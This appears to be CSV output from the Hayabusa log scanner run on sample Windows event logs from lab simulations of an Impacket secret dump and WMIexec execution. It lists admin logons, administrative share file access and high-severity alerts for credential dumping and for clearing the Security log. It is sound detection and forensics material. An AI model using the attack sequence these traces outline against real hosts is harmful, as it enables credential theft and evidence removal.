2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60285 : LogonID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60232 : LogonID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 50078 : LogonID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:14.421 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\BTeHLZkJ.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\NMdzZfem.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\BTeHLZkJ.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\NMdzZfem.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:19.875 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:20.003 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.560 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP\DESKTOP.INI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.696 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 20:32:00.171 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63558 : LogonID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63534 : LogonID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 50896 : LogonID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 56740 : LogonID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 44948 : LogonID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 44948 : LogonID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 44948 : LogonID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63564 : LogonID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
